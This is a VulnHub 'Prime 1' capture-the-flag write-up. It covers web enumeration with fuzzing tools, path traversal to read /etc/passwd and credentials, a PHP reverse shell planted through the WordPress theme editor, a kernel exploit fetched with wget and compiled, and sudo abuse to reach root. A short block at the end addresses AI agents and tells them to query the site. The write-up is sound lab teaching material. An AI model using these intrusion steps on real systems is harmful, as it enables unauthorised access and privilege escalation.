# Prime 1 ## Enumeration ### nmap ``` nmap -sC -sV -oA nmap/Prime1 192.168.1.113 ``` ``` Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 06:04 EDT Nmap scan report for ubuntu (192.168.1.113) Host is up (0.00013s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA) | 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA) |_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: HacknPentest MAC Address: 00:0C:29:B5:6E:B3 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds ``` Let's put the IP to the browser and see what we have ![](/files/-M7YPd9n5MoTXciOGvvP) Nothing much. So let's use `dirb` to enumerate ### dirb ``` dirb http://192.168.1.113 ``` ``` ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun May 17 12:20:36 2020 URL_BASE: http://192.168.1.113/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.113/ ---- + http://192.168.1.113/dev (CODE:200|SIZE:131) + http://192.168.1.113/index.php (CODE:200|SIZE:136) ==> DIRECTORY: http://192.168.1.113/javascript/ + http://192.168.1.113/server-status (CODE:403|SIZE:301) ==> DIRECTORY: http://192.168.1.113/wordpress/ ---- Entering directory: http://192.168.1.113/javascript/ ---- ==> DIRECTORY: http://192.168.1.113/javascript/jquery/ ---- Entering directory: http://192.168.1.113/wordpress/ ---- + http://192.168.1.113/wordpress/index.php (CODE:301|SIZE:0) ==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/ ==> DIRECTORY: http://192.168.1.113/wordpress/wp-content/ ==> DIRECTORY: http://192.168.1.113/wordpress/wp-includes/ + http://192.168.1.113/wordpress/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://192.168.1.113/javascript/jquery/ ---- + http://192.168.1.113/javascript/jquery/jquery (CODE:200|SIZE:284394) ---- Entering directory: http://192.168.1.113/wordpress/wp-admin/ ---- + http://192.168.1.113/wordpress/wp-admin/admin.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/css/ ==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/images/ ==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/includes/ + http://192.168.1.113/wordpress/wp-admin/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/js/ ==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/maint/ ==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/network/ ==> DIRECTORY: http://192.168.1.113/wordpress/wp-admin/user/ ---- Entering directory: http://192.168.1.113/wordpress/wp-content/ ---- + http://192.168.1.113/wordpress/wp-content/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.1.113/wordpress/wp-content/plugins/ ==> DIRECTORY: http://192.168.1.113/wordpress/wp-content/themes/ ==> DIRECTORY: http://192.168.1.113/wordpress/wp-content/uploads/ ---- Entering directory: http://192.168.1.113/wordpress/wp-includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.113/wordpress/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.113/wordpress/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.113/wordpress/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.113/wordpress/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.113/wordpress/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.1.113/wordpress/wp-admin/network/ ---- + http://192.168.1.113/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0) + http://192.168.1.113/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.1.113/wordpress/wp-admin/user/ ---- + http://192.168.1.113/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0) + http://192.168.1.113/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0) ---- Entering directory: http://192.168.1.113/wordpress/wp-content/plugins/ ---- + http://192.168.1.113/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.1.113/wordpress/wp-content/themes/ ---- + http://192.168.1.113/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0) ---- Entering directory: http://192.168.1.113/wordpress/wp-content/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sun May 17 12:21:25 2020 DOWNLOADED: 46120 - FOUND: 15 ``` let's navigate to `dev` and see what we got ![](/files/-M7YQgwSh4--nUanAQjv) Next, we use `dirb` but this time with a parameter `X` and argument `.txt` ``` ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun May 17 12:24:48 2020 URL_BASE: http://192.168.1.113/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt EXTENSIONS_LIST: (.txt) | (.txt) [NUM = 1] ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.113/ ---- + http://192.168.1.113/secret.txt (CODE:200|SIZE:412) ----------------- END_TIME: Sun May 17 12:24:54 2020 DOWNLOADED: 4612 - FOUND: 1 ``` We got a file called `secret.txt` ![](/files/-M7YS9g09_FNZNj9pWTV) Inside here, it provides a [link](https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web) where this method is called Fuzzing ### Fuzzing #### wfuzz We first need to enumerate how long is the word length ``` wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.113/index.php?FUZZ=something ``` ``` ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://192.168.1.113/index.php?FUZZ=something Total requests: 949 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000001: 200 7 L 12 W 136 Ch "@" 000000002: 200 7 L 12 W 136 Ch "00" 000000003: 200 7 L 12 W 136 Ch "01" 000000004: 200 7 L 12 W 136 Ch "02" 000000005: 200 7 L 12 W 136 Ch "03" 000000006: 200 7 L 12 W 136 Ch "1" 000000008: 200 7 L 12 W 136 Ch "100" 000000007: 200 7 L 12 W 136 Ch "10" ``` As we can see is 12 word, then we can add `--hw` parameter inside with `12` indicates hide all the length of 12 of words Then we can run the command below. ``` wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.1.113/index.php?FUZZ=something ``` ``` Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://192.168.1.113/index.php?FUZZ=something Total requests: 949 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000340: 200 7 L 19 W 206 Ch "file" Total time: 1.358470 Processed Requests: 949 Filtered Requests: 948 Requests/sec.: 698.5795 ``` We know that there is a parameter called `file`, from there we can go to the index.php and at the end of the URL put `?file=location.txt` that the `secret.txt` provided for us. ![](/files/-M7YYR8Ri4YYPZE4ZbCp) Got this, secrettier360, on other php page, let's use gobuster to further enumerate. ### gobuster ``` gobuster dir -u http://192.168.1.113/ -w /usr/share/wordlists/dirb/common.txt -x .php ``` ``` =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.113/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php [+] Timeout: 10s =============================================================== 2020/05/17 12:54:49 Starting gobuster =============================================================== /.hta (Status: 403) /.hta.php (Status: 403) /.htaccess (Status: 403) /.htpasswd (Status: 403) /.htpasswd.php (Status: 403) /.htaccess.php (Status: 403) /dev (Status: 200) /image.php (Status: 200) /index.php (Status: 200) /index.php (Status: 200) /javascript (Status: 301) /server-status (Status: 403) /wordpress (Status: 301) =============================================================== 2020/05/17 12:54:51 Finished =============================================================== ``` As we can see, we have another php file called `image.php` Let's use the `wfuzz` again and repeat the steps above by first enumerate how many words needed ``` wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.113/image.php?secrettier360=FUZZ ``` ``` ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://192.168.1.113/image.php?secrettier360=FUZZ Total requests: 949 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000001: 200 6 L 17 W 197 Ch "@" 000000002: 200 6 L 17 W 197 Ch "00" 000000003: 200 6 L 17 W 197 Ch "01" 000000004: 200 6 L 17 W 197 Ch "02" 000000005: 200 6 L 17 W 197 Ch "03" 000000012: 200 6 L 17 W 197 Ch "20" 000000014: 200 6 L 17 W 197 Ch "2000" 000000006: 200 6 L 17 W 197 Ch "1" ``` As we can see 17 words, so we put `--hw` argument at 17 ``` ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://192.168.1.113/image.php?secrettier360=FUZZ Total requests: 949 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000256: 200 13 L 43 W 328 Ch "dev" Total time: 1.601662 Processed Requests: 949 Filtered Requests: 948 Requests/sec.: 592.5094 ``` We then got `dev`, let's supply it inside the URL. ![](/files/-M7Ydlgcgl6NmR83L1nn) ![](/files/-M7Ydo8ok4A9g82Qc8Ll) Next we can replace `dev` to `/etc/passwd` ![](/files/-M7Ye7C1mm8Bt2fBMrzs) We can see that password.txt in the directory /home/saket, lets replace the /etc/passwd ![](/files/-M7YeL3dWazplzPIxVik) We got a password that is `follow_the_ippsec` ## Reverse Shell We found a wordpress website ![](/files/-M7Yeot7UKJNqebLOPy4) Then we go to the log in site and put username as `victor` and password as `follow_the_ippsec` ![](/files/-M7YfPZvhkkj9C8Si5N3) We logged into the admin panel After wandering around, under `Appearance` and go to `Theme Editor` ![](/files/-M7Yg6eL97ZqZZ1V7y4E) On the right side, there is a php file called `secret.php` ![](/files/-M7YgEMulmIAn7qyRTZh) Got a file that can be edited. We can go to [pentestmonkey](http://pentestmonkey.net/tools/web-shells/php-reverse-shell) and grab the php reverse shell file Copy all of the content of the file to the wordpress, then change the IP and port. Update the file Before that we need to set up a listener at our machine ``` nc -nlvp 4444 ``` Then at the URL, navigate to `/wordpress/wp-content/themes/twentynineteen/secret.php` ![](/files/-M7YiqBNjUPsyHuTLJ_w) we got a shell !. ## Privilege Escalation ![](/files/-M7Yj5MUeJxBv2T9G9MY) Navigate to `/home/saket` and get the user flag ### Method 1 ![](/files/-M7YjKfos9ETVCfsRLtU) ``` searchsploit 16.04 Ubuntu | grep Privilege ``` ![](/files/-M7YjhjHnEUruO0VuyVa) Copy it to the current directory Then, at our machine, we use python to transfer the file ``` python -m SimpleHTTPServer ``` At the shell, navigate to `/tmp` folder, Then type `wget 192.168.1.112:8000/45010.c` After that type `gcc 45010.c -o exploit`. Then, `chmod +x exploit` Run the exploit by typing `./exploit` type `/bin/bash -i` to get a proper shell ![](/files/-M7YkoyVOQqQsz7Q3gOr) Navigate to `/root` and cat the `root.txt` and get the flag Congratulation ! ### Method 2 type `sudo -l` and we will get this ![](/files/-M7_jqQT7_Qhk7RUdN0O) Nagivate to `/home/saket` and we will see a executable enc file. ![](/files/-M7_k16xvrvZ-aUlA6ha) Nothing seems to be happening. After further enumeration, we found out that there is a `/opt/backup/server_database` and there is a backup password ![](/files/-M7_kQ0cEeZ00Cz_Cd3X) Navigate back to the `enc` file directory and run it with `sudo ./enc` ![](/files/-M7_khTMVeJGPYiHQesr) ![](/files/-M7_kkFv5mtUKuJ942Ep) We got 2 file, `enc.txt` and `key.txt` ![](/files/-M7_kwkjbasoJbjR-ZMB) ![](/files/-M7_lMUQZ0s_2ud27uMZ) We first change the string `ippsec` to the md5 hash since it tells us to do so. By using this [tool](https://www.devglan.com/online-tools/aes-encryption-decryption), I manage to get the plain text from the encrypted `enc.txt` > Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute\_to\_ippsec"Victor, We can see the password is tribute\_to\_ippsec, let's `su` to `saket` user account. Then type `sudo -l` ![](/files/-M7_nq4QRvryWtcSU4dB) Navigate to victor directory again and type `sudo /home/victor/undefeated_victor` ![](/files/-M7_oG3ISKChL1FCVg6z) We found out that there is no bash for the user victor, we can type ``` cp /bin/bash /tmp/challenge ``` So that we can access a shell for victor. run again with `sudo /home/victor/undefeated_victor` ![](/files/-M7_ouNLhLXTtm1PfEkf) Got root! navigate to /root to cat the root.txt to get the flag! Congratulation! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/vulnhub/prime-1.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.